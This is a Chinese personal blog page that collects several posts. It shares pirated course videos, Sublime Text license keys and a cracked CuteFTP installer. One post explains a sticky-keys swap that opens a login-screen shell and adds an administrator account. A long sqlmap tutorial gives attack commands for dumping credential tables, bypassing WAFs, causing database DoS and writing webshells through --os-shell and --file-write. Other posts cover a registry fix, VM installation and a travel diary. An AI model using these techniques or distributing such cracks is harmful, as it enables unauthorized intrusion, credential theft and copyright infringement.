2015最新.NET 24期Unity3D实战培训-全套不加密 资源分享
看到有人在我博客留言说要这个教程,我就免费分享一下,有需要的自己下载吧。
传智.net 24期就业班培训,相比21期增加了Unity3D游戏,主要培训内容有基础加强六天、数据库四天、SQL和ADO.Net高级三天、JAVAScript、DOM、JQuery、三层项目+SVN、ASP.NET、图书商城项目、MVC、OA项目、Win10通用APP开发、Unity3D游戏实例。龙天技术论坛学习.NET编程开发最佳选择!
2015-04-14基础加强1
2015-04-15基础加强2
2015-04-17基础加强3
2015-04-18基础加强4
2015-04-19基础加强5
2015-04-21基础加强6
2015-04-22 数据库01
2015-04-24 数据库02
2015-04-25 数据库03
2015-04-26 数据库04 SQL和ADO.Net
2015-04-28 SQL和ADO.Net高级
2015-04-29 SQL和ADO.Net高级
2015-04-30 SQL和ADO.Net高级
2015-05-05 JavaScript
2015-05-06 DOM
2015-05-08 DOM
2015-05-09 JQuery
2015-05-10 JQuery
2015-05-12 JQuery
2015-05-13.NET就业班-三层项目+SVN
2015-05-15.NET就业班-三层项目+SVN
2015-05-16.NET就业班-三层项目+SVN
2015-05-17.NET就业班-三层项目+SVN
2015-05-19.NET就业班-三层项目+SVN
2015-05-20 学员项目实战,不录制视频
2015-05-22 学员项目实战,不录制视频
2015-05-23 学员项目实战,不录制视频
2015-05-24-ASP.NET1
2015-05-26-ASP.NET2
2015-05-27-ASP.NET3
2015-05-29-ASP.NET4
2015-05-30-ASP.NET5
2015-05-31-ASP.NET6
2015-06-02-ASP.NET7
2015-06-03-ASP.NET8
2015-06-05-ASP.NET9
2015-06-06-ASP.NET10
2015-06-07-ASP.NET11
2015-06-09 图书商城项目1
2015-06-10 图书商城项目2
2015-06-12 图书商城项目3
2015-06-13 图书商城项目4
2015-06-14 图书商城项目5
2015-06-17 EF
2015-06-18 MVC
2015-06-20 端午节放假
2015-06-21 MVC
2015-06-22-OA项目第一天Asp.netMVC原理,框架搭建内容
2015-06-23-OA项目第二天
2015-06-25-OA项目第三天内容
2015-06-26-OA项目第四天
2015-06-28 OA项目第五天
2015-06-29 OA项目第六天
2015-06-30 OA项目第七天
2015-07-02 OA项目第八天内容
2015-07-03-OA项目第九天内容
2015-07-07 Win10_概述、开发环境、XAML
2015-07-09
2015-07-10 Win10_资源、控件模版、用户控件、动画
2015-07-12 Win10_导航、异步
2015-07-16 Win10_数据绑定、MVVM
2015-07-17 Win10_通知中心、网络编程
2015-07-18 MyMvc
2015-07-20 WebAPI、SignalR、JS跨域
2015-07-21 聊天室案例
2015-07-23 U3d(简介、坐标系、GUI)
2015-07-24 U3d(NGUI、Transform、Light)
2015-07-25 U3d(导入模型、地形与包、物理引擎)
2015-07-27 U3d(寻路、音频、协同、其它)
2015-07-28 U3d(生命周期、优化、着色器、通信)
2015-07-31 U3d(切水果)
2015-08-02 U3d(捕鱼达人)
2015-08-03 U3d(消灭星星)
2015-08-04 U3d(太空射击)
http://pan.baidu.com/s/1gdZqbWR
链接:http://pan.baidu.com/s/1i4yUBD7 密码:henn
扒一扒小米5的那些黑科技 杂七杂八
win7 win10绕过系统密码添加用户登陆 技术文章
[blue] 不使用任何工具/软件来绕过win7、win10的密码从而添加新账户/修改本身账户密码来登陆系统 ,这个方法在网上也有过,今天呢博主专门测试了一下,是可以的,所以发出来,共享。方便大家在忘记密码而又没有工具的时候登录系统。下面就开始吧:[/blue]
0x001
首先我们让电脑重启下,并且还得让他进入修复模式
最简单的方法就是长按电源键,然后直到他强制关机,再开机,哇哦,进入修复模式了呢!
0x002
然后你就看到了非正常关机的修复界面,蓝底白字那个,我不用win10就不截图了,自己感受,然后别点重启,点高级设置!
0x003
然后,又有三个选项,不用管,看图看得懂吧?选择第二个,那个螺丝刀和扳手的自动排查图标!
0x004
这里windows会让你选择从镜像恢复或是命令行提示符,机智的你是不是肯定会选择命令提示符呢?
然后你就想执行命令了是吧?添加账号了是吧?提升为管理员了是吧?
呵呵。。。那我还写着文章干嘛?事实证明是没用的,应为这个命令行无法为正常windows系统添加账户(说的太深,自己理解去吧)
这个时候我们用命令行这样执行:
嗯哼,打完收工。。。。明白了吧,把粘滞键改成cmd。
然后重启电脑,看到登录界面,要我输入密码???按五下shift,CMD弹出来了吧?呼呼。
这个时候,你可以去添加账户了,绝对是添加给当前系统的。
net user p0tt1 p0tt1666 /add
net loucalgroup administrators p0tt1 /add
然后?然后就进去了...进去了...去了...了...
[quote] 注:代码和过程其实都差不多,博主比较懒,不想打字,复制的,原文:http://p0tt1.com/?post/1lyzhz [/quote]
win7系统不能更改文件的打开方式解决办法小计 技术文章
不知道大家有没有发现用WIN7时会出现“打开方式”无法添加这个问题,也就是你想对某个类型的文件(比如txt/php文件)更改或者是添加一种打开方式的时候不能添加/更改。我最近更新了sublimetext 3,是软件它提示我更新的,我就直接点击update-download,结果就出了这悲剧。。。想要更改php文件的打开方式为sublime时,死活添加不了:右击文件->选属性->选择“更改”->选"浏览"->找到sublime_text.exe,之后就没任何反应,在 其他程序框下面也没有,压根儿就没有添加进去;然后又在控制面板里的"默认程序”的“将文件类型或协议与程序关联”,结果也一样,压根儿就没法添加呀!
后来搜索知道原因大概是,windows文件关联的问题,和系统32/64无关。以前版本的sublime变换了路径一样会出问题,解决方法很简单:
在注册表里搜索sublime_text.exe,确认每一个键值都指向最新的sublime_text文件即可。”
对注册表修改不熟的可看下面具体操作:
具体操作:1、按win键+R,出现“运行”,在对话框内打regedit,进入注册表,
2、在注册表上菜单栏中,进入“编辑”-“查找”,打sublime_text,回车
3、在注册表右侧栏中,查看sublime_text的路径是否是现在软件安装盘下的路径,不是的话点右键“修改”,将路径改为现在安装盘下的路径
4、“编辑”-“查找下一个”,重复第三步,直至查找全部结束,退出注册表
完成以上,再右键-文件“打开方式”,看是否有sublimetext?不出意外应该有了。
还有一种更简单的方法,就是把软件的文件名修改一下,再去添加关联就可以了!!!只是这种方法会让快捷方式失效,需要我们自己修改一下快捷方式的目标文件名。
4枚Sublime text 3 3103 注册码-最新版Sublime text 3 license key 4枚 资源分享
Sublime text 3 (Build 3103) license key,最新版Sublime text 3 license key 注册码:需要使用的童鞋可以直接粘贴复制进去就可以使用了,道目前为止,注册码一直有效,为了避免被搜索引擎收录和谐,所以以文本形式下载,一共有四枚,四枚,四枚-重要的事情说三遍:
一共有四枚注册码,欢迎下载测试:
SQLMAP注入教程-个人笔记精华整理分享-11种常见SQLmap使用方法详解 渗透测试
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。
一共有11种,乌云知识库也有一片比较全面的介绍各个参数的文章:
SQLmap用户手册:http://drops.wooyun.org/tips/143
1.SQLMAP用于Access数据库注入
(1)猜解是否能注入
win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
Linux : ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
(2)猜解表
win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables
Linux: ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables
(3)根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)
win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin
Linux: ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin
(4)根据字段猜解内容(假如通过3得到字段为username和password)
win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"
Linux: ./sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C
"username,password"
2.SQLMAP用于Cookie注入
(1)cookie注入,猜解表
win : python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2
(2)猜解字段,(通过1的表猜解字段,假如表为admin)
win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T
admin --level 2
(3)猜解内容
win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T
admin -C "username,password" --level 2
3.SQLMAP用于mysql中DDOS攻击
(1)获取一个Shell
win:
python sqlmap.py -u http://192.168.159.1/news.php?id=1 --sql-shell
Linux:
sqlmap -u http://192.168.159.1/news.php?id=1 --sql-shell
(2)输入执行语句完成DDOS攻击
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)
4.SQLMAP用于mysql注入
(1)查找数据库
python sqlmap.py -u "http://www.xxx.com/link.php?id=321" --dbs
(2)通过第一步的数据库查找表(假如数据库名为dataname)
python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname --tables
(3)通过2中的表得出列名(假如表为table_name)
python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns
(4)获取字段的值(假如扫描出id,user,password字段)
python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C
"id,user,password" --dump
5.SQLMAP中post登陆框注入
(1)其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件
我们在使用Sqlmap进行post型注入时,
经常会出现请求遗漏导致注入失败的情况。
这里分享一个小技巧,即结合burpsuite来使用sqlmap,
用这种方法进行post注入测试会更准确,操作起来也非常容易。
- 浏览器打开目标地址http:// www.xxx.com /Login.asp
- 配置burp代理(127.0.0.1:8080)以拦截请求
- 点击login表单的submit按钮
- 这时候Burp会拦截到了我们的登录POST请求
- 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
- 运行sqlmap并使用如下命令:
./sqlmap.py -r search-test.txt -p tfUPass
这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
而-p 大家应该比较熟悉,指定注入用的参数。
注入点:http://testasp.vulnweb.com/Login.asp
几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass
(2)自动的搜索
sqlmap -u http://testasp.vulnweb.com/Login.asp --forms
(3)指定参数搜索
sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=321&tfUPass=321"
6.SQLMAP中Google搜索注入
inurl后面的语言是由自己定的
注入过程中如果选y是注入,如果不是选n
sqlmap -g inurl:php?id=
7.SQLMAP中的请求延迟
参数 --delay --safe-freq
python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --delay 1
python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --safe-freq 3
参数
8.SQLMAP绕过WAF防火墙
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py
都是编码方式
space2hash.py base64encode.py charencode.py
9.SQLMAP查看权限
sqlmap -u http://192.168.159.1/news.php?id=1 --privileges
10.SQLMAP伪静态注入
(1)查找数据库
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs
(2)通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables
(3)通过2中的数据表得到字段(假如得到的是tablename表)
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T
tablename --columns
(4)通过3得到字段值(假如从3中得到字段id,password)
python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T
tablename -C "password" --dump
11.SQLMAP注入点执行命令与交互写shell
(1)
注入点:http://192.168.159.1/news.php?id=1
此处采用的是Linux系统
sqlmap -u http://192.168.159.1/news.php?id=1 --os-cmd=ipconfig
出现语言的选择根据实际的测试网站选择语言
指定目标站点D:/www/
(2)获取Shell
sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
出现语言的选择根据实际的测试网站选择语言
指定目标站点D:/www/
输入ipconfig/all
创建用户和删除用户只要权限足够大,你可以输入使用任何命令。
其他命令参考下面:
从数据库中搜索字段
sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password
在dedecms数据库中搜索字段admin或者password。读取与写入文件
首先找需要网站的物理路径,其次需要有可写或可读权限。
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
#示例:
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”使用shell命令:
sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
接下来指定网站可写目录:
“E:\php\htdocs\dvwa”#注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)
sqlmap详细命令:
- –is-dba 当前用户权限(是否为root权限)
- –dbs 所有数据库
- –current-db 网站当前数据库
- –users 所有数据库用户
- –current-user 当前数据库用户
- –random-agent 构造随机user-agent
- –passwords 数据库密码
- –proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理
- –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
——————————————————————————————————
Options(选项):
- –version 显示程序的版本号并退出
- -h, –help 显示此帮助消息并退出
- -v VERBOSE 详细级别:0-6(默认为1)
Target(目标):
以下至少需要设置其中一个选项,设置目标URL。
- -d DIRECT 直接连接到数据库。
- -u URL, –url=URL 目标URL。
- -l LIST 从Burp或WebScarab代理的日志中解析目标。
- -r REQUESTFILE 从一个文件中载入HTTP请求。
- -g GOOGLEDORK 处理Google dork的结果作为目标URL。
- -c CONFIGFILE 从INI配置文件中加载选项。
Request(请求):
这些选项可以用来指定如何连接到目标URL。
- –data=DATA 通过POST发送的数据字符串
- –cookie=COOKIE HTTP Cookie头
- –cookie-urlencode URL 编码生成的cookie注入
- –drop-set-cookie 忽略响应的Set – Cookie头信息
- –user-agent=AGENT 指定 HTTP User – Agent头
- –random-agent 使用随机选定的HTTP User – Agent头
- –referer=REFERER 指定 HTTP Referer头
- –headers=HEADERS 换行分开,加入其他的HTTP头
- –auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
- –auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
- –auth-cert=ACERT HTTP认证证书(key_file,cert_file)
- –proxy=PROXY 使用HTTP代理连接到目标URL
- –proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)
- –ignore-proxy 忽略系统默认的HTTP代理
- –delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
- –timeout=TIMEOUT 等待连接超时的时间(默认为30秒)
- –retries=RETRIES 连接超时后重新连接的时间(默认3)
- –scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
- –safe-url=SAFURL 在测试过程中经常访问的url地址
- –safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
Enumeration(枚举):
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行
您自己的SQL语句。- -b, –banner 检索数据库管理系统的标识
- –current-user 检索数据库管理系统当前用户
- –current-db 检索数据库管理系统当前数据库
- –is-dba 检测DBMS当前用户是否DBA
- –users 枚举数据库管理系统用户
- –passwords 枚举数据库管理系统用户密码哈希
- –privileges 枚举数据库管理系统用户的权限
- –roles 枚举数据库管理系统用户的角色
- –dbs 枚举数据库管理系统数据库
- -D DBname 要进行枚举的指定数据库名
- -T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
- –tables 枚举的DBMS数据库中的表
- –columns 枚举DBMS数据库表列
- –dump 转储数据库管理系统的数据库中的表项
- –dump-all 转储所有的DBMS数据库表中的条目
- –search 搜索列(S),表(S)和/或数据库名称(S)
- -C COL 要进行枚举的数据库列
- -U USER 用来进行枚举的数据库用户
- –exclude-sysdbs 枚举表时排除系统数据库
- –start=LIMITSTART 第一个查询输出进入检索
- –stop=LIMITSTOP 最后查询的输出进入检索
- –first=FIRSTCHAR 第一个查询输出字的字符检索
- –last=LASTCHAR 最后查询的输出字字符检索
- –sql-query=QUERY 要执行的SQL语句
- –sql-shell 提示交互式SQL的shell
Optimization(优化):
这些选项可用于优化SqlMap的性能。
- -o 开启所有优化开关
- –predict-output 预测常见的查询输出
- –keep-alive 使用持久的HTTP(S)连接
- –null-connection 从没有实际的HTTP响应体中检索页面长度
- –threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
Injection(注入):
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。
- -p TESTPARAMETER 可测试的参数(S)
- –dbms=DBMS 强制后端的DBMS为此值
- –os=OS 强制后端的DBMS操作系统为这个值
- –prefix=PREFIX 注入payload字符串前缀
- –suffix=SUFFIX 注入payload字符串后缀
- –tamper=TAMPER 使用给定的脚本(S)篡改注入数据
Detection(检测):
这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。
- –level=LEVEL 执行测试的等级(1-5,默认为1)
- –risk=RISK 执行测试的风险(0-3,默认为1)
- –string=STRING 查询时有效时在页面匹配字符串
- –regexp=REGEXP 查询时有效时在页面匹配正则表达式
- –text-only 仅基于在文本内容比较网页
Techniques(技巧):
这些选项可用于调整具体的SQL注入测试。
- –technique=TECH SQL注入技术测试(默认BEUST)
- –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
- –union-cols=UCOLS 定列范围用于测试UNION查询注入
- –union-char=UCHAR 用于暴力猜解列数的字符
Fingerprint(指纹):
- -f, –fingerprint 执行检查广泛的DBMS版本指纹
Brute force(蛮力):
这些选项可以被用来运行蛮力检查。
- –common-tables 检查存在共同表
- –common-columns 检查存在共同列
User-defined function injection(用户自定义函数注入):
这些选项可以用来创建用户自定义函数。–udf-inject 注入用户自定义函数
–shared-lib=SHLIB 共享库的本地路径File system access(访问文件系统):
这些选项可以被用来访问后端数据库管理系统的底层文件系统。
- –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
- –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
- –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
Operating system access(操作系统访问):
这些选项可以用于访问后端数据库管理系统的底层操作系统。
- –os-cmd=OSCMD 执行操作系统命令
- –os-shell 交互式的操作系统的shell
- –os-pwn 获取一个OOB shell,meterpreter或VNC
- –os-smbrelay 一键获取一个OOB shell,meterpreter或VNC
- –os-bof 存储过程缓冲区溢出利用
- –priv-esc 数据库进程用户权限提升
- –msf-path=MSFPATH Metasploit Framework本地的安装路径
- –tmp-path=TMPPATH 远程临时文件目录的绝对路径
Windows注册表访问:
这些选项可以被用来访问后端数据库管理系统Windows注册表。
- –reg-read 读一个Windows注册表项值
- –reg-add 写一个Windows注册表项值数据
- –reg-del 删除Windows注册表键值
- –reg-key=REGKEY Windows注册表键
- –reg-value=REGVAL Windows注册表项值
- –reg-data=REGDATA Windows注册表键值数据
- –reg-type=REGTYPE Windows注册表项值类型
这些选项可以用来设置一些一般的工作参数。
- -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
- -s SESSIONFILE 保存和恢复检索会话文件的所有数据
- –flush-session 刷新当前目标的会话文件
- –fresh-queries 忽略在会话文件中存储的查询结果
- –eta 显示每个输出的预计到达时间
- –update 更新SqlMap
- –save file保存选项到INI配置文件
- –batch 从不询问用户输入,使用所有默认配置。
Miscellaneous(杂项):
- –beep 发现SQL注入时提醒
- –check-payload IDS对注入payloads的检测测试
- –cleanup SqlMap具体的UDF和表清理DBMS
- –forms 对目标URL的解析和测试形式
- –gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
- –page-rank Google dork结果显示网页排名(PR)
- –parse-errors 从响应页面解析数据库管理系统的错误消息
- –replicate 复制转储的数据到一个sqlite3数据库
- –tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
- –wizard 给初级用户的简单向导界面
小技巧使用QQVIP加速下载往期的LOL补丁文件 杂七杂八
博主今天把家里的台式机搞好了,小表弟想安装LOL,他电脑里面有7.0的下载好的安装包,就复制过来了,可是更新的速度太慢了,20M的光线,更新速度才350kb左右,受不了这速度,就去下载补丁包文件啊,可是下载v3.1.7.0-v3.1.7.1升级补丁和v3.1.7.1-v3.1.7.2升级补丁不可以使用QQ会员加速下载,博主手上只有会员,没有蓝砖,蓝砖下载速度同样慢死了:
可是,我从下载里面发现这个:
就是在下载最新的补丁的时候可以使用QQ会员加速下载,把链接复制出来试了一下,是可以的!
http://182.247.229.147/dlied1.qq.com/lol/dltools/LOL_V3.1.7.2-V3.1.7.3_PATCH_QQVIPDL_signed.exe?mkey=56a3a45bf6e95083&f=6d25&p=.exe
我们只需要把其中的版本号秀修改一下就可以使用QQ会员加速下载了,再也不担心没有蓝砖了!
看看现在的更新速度--2.6M/s稳定加速下载!
就这么简单就可以达到全速下载!爽到爆,但是不保证对所有的有用,请自测!
【图文教程】如何将gho格式后缀的系统文件安装在空白的虚拟机上 技术文章
首先说一下,博主写这篇文章是因为博主在学习过程中恰好遇到了这个问题--如何将gho格式后缀的系统文件安装在空白的虚拟机上,并且最终解决了我的问题,所以在此小计一下。这时候系统文件是gho,没有安装菜单,不支持分区怎么办?那么看下面的方法,不需要iso虚拟机测试安装gho系统的方法.
还有一种情况是物理机安装了系统发现不对劲,怀疑是安装工具修改了系统,排查重装系统又太麻烦,就可以用虚拟机测试了.
准备工作:gho文件,DiskGenius,GhostExp,两个软件的下载地址:https://userscloud.com/lfbb6g8jv10m http://pan.baidu.com/s/1eRcw5xC
大致步骤我说一下,其中一些不需需要改变的步骤我就不说了,需要注意的地方和重要的地方我会贴图,详情请看图:
自定义创建:
不需要加载光驱,选择稍后安装系统:
这里可选择创建的虚拟系统的版本,这里是选择XP:
虚拟系统保存目录选择,可自定义,但是一定要记得保存的路径:
创建完虚拟机后打开DG分区工具,打开虚拟硬盘文件,就是虚拟系统的文件:
看好了,别选错了,一般就是你命名以为vdmk之类的结尾的:
这里只是作为演示,我就知分了一个区,在实际使用中,可以根据自己的需求来分区,然后格式化:
打开我的电脑就出现了Z盘:
然后用gho镜像浏览器打开gho系统镜像文件,全选,右键提取到Z盘:
切记--提取复制完后别忘了虚拟机磁盘管理取消共享的Z盘:
然后打开虚拟机电源启动虚拟系统,看见这个启动界面就是成功了..:如下图
以上是vm虚拟机安装测试系统的方法只用到了虚拟机和另外两个小工具,并没有用任何iso文件或者是什么PE系统....
掌握了这个方法以后遇到下载的gho就不用担心没法测试了.同时也方便大家在虚拟机安装gho格式的系统。不懂得可以评论留言,我看见了就会尽快回复。
CuteFTP 9.0.5.0007最新破解版安装版 破解软件
先说点题外话,最近比较忙,也没有更新博客文章,唉,博主是衰到了极点啊,感冒咳嗽居然咳出血,还要复习,而且家里好冷 {{{(>_<)}}},冻腿动手,就更不想敲键盘了啊!
PS:服务器,估计快要挂了,前两天服务商说我的服务器参与DDOS攻击,给我停机了,前前后后折腾了一天,博客也因此宕机一天!求包养,服务器费用:(扫码赞助一服务器费用吧,O(∩_∩)O谢谢!)
见谅各位!好了,接下来进入正题:
CuteFTP,FTP工具之一,与LeapFTP与FlashFXP并称 FTP 三剑客。其传输速度比较快,但有时对于一些教育网FTP 站点却无法连接;速度稳定,能够连接绝大多数 FTP 站点(包括一些教育网站点);CuteFTP 虽然相对来说比较庞大,但其自带了许多免费的 FTP 站点,资源丰富。
尔博主破解它的原因也很简单,就是因为我使用原来的FlashXP下载东西,速度慢到出奇!气死本宝宝了,就去cuteftp官网下载了一个最新版的来安装,下载速度确实比之前快多了!但是只能免费使用30天,于是就有了......嘿嘿,你们懂的.
下面来说一下如何使用这个破解版的安装包.
首先下载(前两个为精简版):
国外网盘: https://userscloud.com/ebwsmqs33eh7
百度网盘: http://pan.baidu.com/s/1o6WaBxw
备份的完整版: http://pan.baidu.com/s/1kUktGu7
下载下来之后直接双击打开安装即可,一路回车到底,安装完,打开CuteFTP,弹出的注册对话框跟着我下面的图片操作:
点击 Enter Serial Number,计入输入注册码的流程.
随便输入 Serial Number ,比如 mrxn.net
名字,邮件.公司这些都可以随便填写,然后下一步,完成注册,打开CuteFTP界面后会发现全是英文,对于英语不好的童鞋来说使用就有点困难,于是,下面博主叫你如何将CuteFTP的语言设置成简体中文,看图就明白了:
好了,就写到这里了吧,一会儿说不定写个 将gho文件格式的系统装在空白的VM虚拟机上.
假日游记 杂七杂八
从放假,哈尔滨一天,之后,飞往青岛,在青岛带了半天,飞往重庆,重庆带了半天,坐火车前往成都,在成都去爬了一下金龙长城,感觉好短好矮,没爬多久不到一小时 就到顶了。。。没啥感觉就结束了,不过出汗了!走小路下来后和童鞋去了洛带古镇,好吃的太多了!差点撑死。。。什么臭豆腐、烤肉串、糍粑、米糕、各种地方特色小吃,记不到了,太多了;从洛带和童鞋回家的时候都是晚上7点了,刚好遇上成都的晚高峰,做个公交车都快要睡好几觉瞌睡了,回到成都都是晚上9点多了。。。其实站挺多的,加起来差不多70多站!哈哈,回成都又陪童鞋去看他在58同城上面看中的一台二手电脑(由于不走市区,于是叫了个Uber),想买来玩LOL,让我这个略懂的跟他一同前往验货,结果还是很不错,一千多块钱搞定,主机拆开看了一下,就是灰太多了,PS,那个卖家也是个青年,但是估计他们的屋子几个月没扫过了,好脏!!!折腾完回到成都都是晚上11点了,再去夜市烧烤摊吃点烧烤,他回公司,我会自己的临时住处,洗个澡,躺床上都是半夜了,哎。。。想想,真能折腾呀。有句话说:生命在于折腾嘛!第二天起床就去了杜甫草堂,看看我们伟大的诗圣,进去后,发现这里面简直就是都市里面的一个世外桃源啊!古树林立,湿气逼人,冷死我了! 夏天去就好了!多凉快,再带点吃的,在里面乘凉,小憩一下,避避暑还是不错的,但是门票60RMB,这个乘凉未免有点奢侈啊!我等穷逼享受不起, 想着想着,看着看着就狂完了,从北门出去后,直接去 锦里,一个古香古色的一条街,各种小吃,手工艺品,还有不少外国的man和woman 。可惜我的英语实在是太渣了,没有勇气上去搭讪,还是不顾肚子撑破的危险一顿狂吃呀!吃饱吃不动了就走咯呗,不然越看越想吃!然后出来后顺道去参观了一下博物馆和青羊宫。我对这些不怎么感冒。。。只是浏览,嗯 确实是浏览!结束今天的游荡之行,打道回府!
写下这篇流水账,只是记录一下自己的生活而已,希望很久以后,博客还在的话,自己看到了还会有当初的那种纯粹的说走就走的冲动!当然,前提是有准备的,没有准备的说走就走的旅行注定是悲剧的。还是那句话,年轻,就该多出去走走,但是得理性冲动!仅此纪念自己逝去的那些青春岁月。如果你看到这里看完了我的流水账,恭喜你,你中奖了!哈哈 开玩笑。晚安! Hello World !